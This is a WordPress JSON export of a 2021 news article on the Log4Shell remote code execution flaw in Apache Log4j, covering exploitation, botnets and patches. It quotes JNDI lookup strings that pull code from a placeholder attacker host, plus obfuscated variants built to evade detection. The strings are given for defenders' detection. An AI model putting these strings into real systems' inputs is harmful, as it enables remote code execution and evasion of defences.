{"id":44427,"date":"2021-12-14T15:24:59","date_gmt":"2021-12-14T15:24:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/32911\/The-Latest-On-The-Log4j-Remote-Code-Execution-Nightmare.html"},"modified":"2021-12-14T15:24:59","modified_gmt":"2021-12-14T15:24:59","slug":"the-latest-on-the-log4j-remote-code-execution-nightmare","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","title":{"rendered":"The Latest On The Log4j Remote Code Execution Nightmare"},"content":{"rendered":"<p>Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly \u2013 for now \u2013 on turning infected devices into cryptocurrency-mining botnet drones.<\/p>\n<p>Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail <a target=\"_blank\" href=\"https:\/\/blog.checkpoint.com\/2021\/12\/11\/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1\/\" rel=\"noopener\">in a blog post<\/a>.<\/p>\n<p>Apache Log4j is an open-source logging library written in Java that is used all over the world in many software packages and online systems. 
Last week <a target=\"_blank\" href=\"https:\/\/www.theregister.com\/2021\/12\/10\/log4j_remote_code_execution_vuln_patch_issued\/\" rel=\"noopener\">it emerged<\/a> that Alibaba security engineer Chen Zhaojun had found and privately disclosed on November 24 details of a trivial-to-exploit remote code execution hole (<a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\">CVE-2021-44228<\/a>) in Log4j 2.x, specifically versions 2.14.1 and earlier.<\/p>\n<p>Exploitation is possible by feeding a specially crafted snippet of text, such as a message or username, to an application that logs this information using Log4j 2. If the text contains a particular sequence of characters, the logging utility will end up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. 
It is easily wormable, and is present in all manner of things, from Steam and Minecraft to spacecraft and Apple&#8217;s iCloud.<\/p>\n<p>If you can imagine systems 
logging site search queries, browser user-agent strings, failed login attempts, and other visitor and customer-supplied stuff, and that this text can be weaponized to achieve code execution in the backend, you can appreciate how attractive this hole is for crooks and fraudsters. The vulnerability has been generally dubbed <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day\/\">Log4Shell<\/a>.<\/p>\n<p>On December 9, in response to Zhaojun&#8217;s findings, version 2.15 of Log4j was <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\">released<\/a> with part of the exploitable functionality disabled by default. This should be installed as a priority, or one of the mitigations considered if you can&#8217;t update right now.<\/p>\n<p>Proof-of-concept code to abuse the insecure logging library also spread across the web. 
This makes this whole situation dangerous because the code is so prevalent, it is easy to exploit, and there is plenty of working <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce\">example attack code<\/a> out there while many systems remain unpatched. The flaw is rated 10 out of 10 in terms of severity.<\/p>\n<p>System admins as well as developers may be tempted to use one of the available proof-of-concept exploits to see if their applications, and their numerous dependencies, use the logging library and are therefore vulnerable to the flaw \u2013 and that&#8217;s not a terrible idea at all. However, bear in mind that it&#8217;s quite possible those exploiting services out in the wild are also patching Log4j after the initial compromise to keep other miscreants out. Thus, you should consider auditing your code, and installing updates from vendors, as well as look for indicators of compromise and signs that the software has been patched by an intruder.<\/p>\n<div class=\"boxout\">\n<h3 class=\"crosshead\"><span>Useful links<\/span><\/h3>\n<ul>\n<li>A <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.cygenta.co.uk\/post\/log4shell-in-simple-terms\">gentle explanation<\/a> of the Log4j bug by Cygenta<\/li>\n<li>A more <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/blog.shiftleft.io\/log4shell-jndi-injection-via-attackable-log4j-6bfea2b4896e\">technical breakdown<\/a> by ShiftLeft<\/li>\n<li>Cybereason <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/Cybereason\/Logout4Shell\">released<\/a> what it called a vaccine that exploits the flaw to disable the bugged functionality in Log4j<\/li>\n<li>Here&#8217;s a <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/curated-intel\/Log4Shell-IOCs\">curated list<\/a> of known indicators-of-compromise<\/li>\n<li>And a <a target=\"_blank\" rel=\"nofollow noopener\" 
href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\">big list of vendors<\/a> shipping patches because their products include Log4j 2.x. Don&#8217;t forget: application and server software that include the logging tool need to be distributed to users and installed<\/li>\n<li>Cloudflare CEO Matthew Prince <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/eastdakota\/status\/1469800951351427073\">said<\/a> his biz discovered Log4j exploit attempts happening as early as December 1, and Cisco <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/blog.talosintelligence.com\/2021\/12\/apache-log4j-rce-vulnerability.html\">said<\/a> it saw attempts the next day<\/li>\n<\/ul>\n<\/div>\n<p>For now, the infosec industry is mainly sounding the alarm and telling the world that a Very Bad Thing has come to light \u2013 with many taking the opportunity to push their own security defense products, we couldn&#8217;t help but note. So far, the vuln is seemingly mostly being used to install crypto-mining bots on servers amid scans for at-risk devices, though it&#8217;s early days yet.<\/p>\n<p>Bitdefender said its honeypot network had seen an increase in scans from &#8220;Russia-based IP addresses,&#8221; which as a bare fact on its own means little; anyone can route their web traffic through a Russia-based node, with some occasionally <a target=\"_blank\" href=\"https:\/\/www.theregister.com\/2019\/12\/05\/fooling_attribution_breadcrumbs\/\" rel=\"noopener\">doing so<\/a> for fun and profit.<\/p>\n<p>Sophos warned that cryptocoin-mining botnets are one of the more popular post-exploit payloads it&#8217;s seeing as a result of successful Log4j compromises. 
The firm said in a <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/12\/log4shell-hell-anatomy-of-an-exploit-outbreak\/\">blog post<\/a> that botnets &#8220;focus on Linux server platforms, which are particularly exposed to this vulnerability.&#8221;<\/p>\n<p>&#8220;Log4j is a library that is used by many products,&#8221; said Sophos senior threat researcher Sean Gallagher. &#8220;It can therefore be present in the darkest corners of an organization\u2019s infrastructure. For example: any software developed in-house. Finding all systems that are vulnerable to Log4Shell should be a priority for IT security.&#8221;<\/p>\n<p>Sophos also warned of Log4j-related attempts to steal AWS private keys. For its part, Amazon Web Services&#8217; security arm <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/aws.amazon.com\/blogs\/opensource\/hotpatch-for-apache-log4j\/\">published<\/a> what it says is a hotpatching utility for Log4j.<\/p>\n<p>Various infosec companies have started live blogs or 
rapidly updated posts with mitigation information, including Randori (one of the first Western companies to publish detailed <a target=\"_blank\" href=\"https:\/\/www.randori.com\/blog\/cve-2021-44228\/\" rel=\"noopener\">information<\/a> about the remote code execution hole) as well as Trend Micro and others.<\/p>\n<p>Microsoft published its own Log4j exploitation <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.microsoft.com\/security\/blog\/2021\/12\/11\/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation\/\">prevention advice<\/a>, saying it has mostly seen &#8220;mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.&#8221;<\/p>\n<p>Redmond said: &#8220;An example pattern of attack would appear in a web request log with strings like the following:&#8221;<\/p>\n<pre class=\"wrap_text\">${jndi:ldap:\/\/[attacker site]\/a}\n<\/pre>\n<p>&#8220;We\u2019ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections,&#8221; the Windows giant added.<\/p>\n<p>Like with previous big scary bugs, Log4Shell has a website, a hastily drawn logo, tons of headlines, and probably a three-book publication deal and a movie. Probably. Does it deserve all this excitement? Well, that depends on how fast you patch. \u00ae<\/p>\n<h3 class=\"crosshead\"> <span>Bootnote<\/span><br \/>\n<\/h3>\n<p>F-Secure&#8217;s CISO Erka Koivunen echoed all the usual warnings, adding: &#8220;Please don\u2019t change your Tesla or iPhone name into ${jndi:ldap:\/\/url\/a} unless you want unexpected user experience.&#8221;<\/p>\n<p>That would be a terrible thing to do. Really upsetting. So don&#8217;t do it. 
No, please, don&#8217;t.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/32911\/The-Latest-On-The-Log4j-Remote-Code-Execution-Nightmare.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[9778],"class_list":["post-44427","post","type-post","status-publish","format-standard","hentry","category-packet-storm","tag-headlinehackerdata-lossflawjavaapache"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-14T15:24:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"The Latest On The Log4j Remote Code Execution Nightmare\",\"datePublished\":\"2021-12-14T15:24:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"},\"wordCount\":1048,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"keywords\":[\"headline,hacker,data loss,flaw,java,apache\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\",\"name\":\"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"datePublished\":\"2021-12-14T15:24:59+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\",\"url\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"contentUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3
D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,data loss,flaw,java,apache\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackerdata-lossflawjavaapache\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"The Latest On The Log4j Remote Code Execution Nightmare\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44427"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44427\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}